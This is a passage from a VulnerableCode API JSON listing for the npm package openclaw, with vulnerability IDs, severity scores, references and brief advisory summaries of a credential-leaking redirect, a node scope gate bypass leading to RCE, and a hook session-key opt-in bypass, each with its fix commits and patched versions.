"vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-34426", "GHSA-h3x4-hc5v-v2gm" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xyck-sspa-4ba2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89013?format=api", "vulnerability_id": "VCID-xz8s-hj5s-wfgj", "summary": "OpenClaw: Media download follows cross-origin redirects with Authorization headers intact\n## Summary\nMedia download follows cross-origin redirects with Authorization headers intact\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 media downloads forwarded Authorization across cross-origin redirects, a real in-scope credential-leak class that fits medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f` — 2026-03-31T19:57:42+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h" }, { "reference_url": "https://github.com/advisories/GHSA-68v4-hmwv-f43h", "reference_id": "GHSA-68v4-hmwv-f43h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-68v4-hmwv-f43h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-68v4-hmwv-f43h" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xz8s-hj5s-wfgj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89532?format=api", "vulnerability_id": "VCID-xzg5-ren5-p7gw", "summary": "OpenClaw: Device-Paired Node Skips Node Scope Gate → Host RCE.md\n## Summary\nDevice-Paired Node Skips Node Scope Gate → Host RCE.md\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28 because a merely device-paired node could expose node commands without node pairing, but high is sufficient given the pairing/setup prerequisites.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41352", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00536", "scoring_system": "epss", "scoring_elements": "0.67865", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00536", "scoring_system": "epss", "scoring_elements": "0.67876", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00536", "scoring_system": "epss", "scoring_elements": "0.67869", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41352" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41352", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41352" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass" }, { "reference_url": "https://github.com/advisories/GHSA-xj9w-5r6q-x6v4", "reference_id": "GHSA-xj9w-5r6q-x6v4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xj9w-5r6q-x6v4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41352", "GHSA-xj9w-5r6q-x6v4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xzg5-ren5-p7gw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89941?format=api", "vulnerability_id": "VCID-y65g-4baa-a7c2", "summary": "OpenClaw: Hook mapping templates could bypass hook session-key opt-in\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nTemplated hook mapping `sessionKey` values were treated differently from request-supplied session keys. A hook mapping could render an externally influenced session key even when `hooks.allowRequestSessionKey` was disabled, bypassing the intended routing opt-in for hook callers.\n\nThis affects webhook routing isolation. It does not grant host execution by itself. Severity is medium.\n\n## Fix\n\nTemplate-rendered mapping session keys are now treated as externally supplied routing input and require `hooks.allowRequestSessionKey=true` plus the existing prefix policy checks.\n\nFix commit:\n\n- `5275d008ed33203dba3f98e969ad683a65c416c3`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45002", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10694", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10682", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10719", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45002" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": 